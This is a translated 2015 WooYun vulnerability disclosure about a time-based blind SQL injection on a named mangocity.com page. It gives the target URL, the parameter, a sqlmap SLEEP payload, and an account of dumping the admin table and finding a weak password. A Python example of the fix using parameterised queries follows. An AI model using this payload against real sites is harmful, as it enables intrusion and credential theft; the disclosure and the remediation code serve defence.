Vulnerability summary

Defect ID: wooyun-2015-0135214

Title: SQL injection in a 芒果网 (mangocity.com) site (administrator information obtainable)

Vendor: 芒果网

Author: 路人甲

Submitted: 2015-08-19 10:01

Fixed: 2015-08-24 10:02

Published: 2015-08-24 10:02

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-08-19: Details sent to the vendor, awaiting the vendor's response
2015-08-24: The vendor chose to ignore the vulnerability; details disclosed to the public

Brief description:

test

Detailed description:

The Beijing sub-site of 芒果网 has a SQL injection vulnerability through which administrator information can be obtained.

Proof of vulnerability:

URL: http://bj.mangocity.com/visa/tour_show.jsp?jspmaker_act_id=1027303

Parameter: jspmaker_act_id (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: jspmaker_act_id=1027303 AND (SELECT * FROM (SELECT(SLEEP(5)))inWm)


Through the injection the list of databases (dbs) can be retrieved.

[screenshot: 2.jpg]

The current database is ut7.

[screenshot: 4.jpg]

This database contains 161 tables.

[screenshot: 1.jpg]




Dumped the t_admin table to verify; the administrator password is still a weak password...

[screenshot: 3.jpg]

Fix recommendation:

Filter input properly.
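The report's fix advice ("filter properly") is best implemented by validating the parameter's shape and binding it as a query parameter instead of splicing it into the SQL string. The following Python/SQLite stand-in is an added example, not the site's JSP code: it assumes tour_show.jsp reads a row of tour_basic_info (a table from the dump above) by id, uses made-up column names, and replaces MySQL's SLEEP() with a recording stub so the report's own sqlmap payload can be run through the vulnerable and the hardened path without actually blocking.

```python
import re
import sqlite3

# The sqlmap payload quoted in the report.
PAYLOAD = "1027303 AND (SELECT * FROM (SELECT(SLEEP(5)))inWm)"

def make_db():
    """Constructed in-memory stand-in for the site's MySQL database (assumption:
    tour_show.jsp reads tour_basic_info by id; the column names are made up)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tour_basic_info (act_id INTEGER PRIMARY KEY, title TEXT)")
    conn.execute("INSERT INTO tour_basic_info VALUES (1027303, 'sample tour')")
    # SQLite has no SLEEP(); register a stub that only records the call, so we can
    # observe whether injected SQL reached the engine without waiting 5 seconds.
    calls = []
    conn.create_function("SLEEP", 1, lambda secs: calls.append(secs) or 0)
    return conn, calls

def vulnerable_lookup(conn, act_id):
    """'Before': the raw request parameter is spliced into the SQL text."""
    sql = "SELECT title FROM tour_basic_info WHERE act_id=" + act_id
    return conn.execute(sql).fetchall()

def safe_lookup(conn, act_id):
    """'After': an id parameter must look like an id, and it is bound, never spliced."""
    if not re.fullmatch(r"[0-9]{1,10}", act_id):
        raise ValueError("jspmaker_act_id must be a decimal id")
    sql = "SELECT title FROM tour_basic_info WHERE act_id=?"
    return conn.execute(sql, (int(act_id),)).fetchall()

def demo():
    """Run the report's payload through both paths. Returns
    (SLEEP evaluated via the vulnerable path, payload rejected by the safe path,
     rows returned by the safe path for a legitimate id)."""
    conn, calls = make_db()
    vulnerable_lookup(conn, PAYLOAD)  # the engine evaluates the injected SLEEP()
    try:
        safe_lookup(conn, PAYLOAD)
        rejected = False
    except ValueError:
        rejected = True
    return len(calls) > 0, rejected, safe_lookup(conn, "1027303")

if __name__ == "__main__":
    print(demo())  # (True, True, [('sample tour',)])
```

The recorded SLEEP() call is the same signal sqlmap's time-based check relies on; with the bound parameter the injected text never reaches the SQL parser.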

Copyright notice: when reposting, credit the source as 路人甲@乌云


Vulnerability response

Vendor response:

Severity: No impact, vendor ignored

Ignored at: 2015-08-24 10:02

Vendor reply:

Vulnerability Rank: 15 (WooYun assessment)

Latest status:

None yet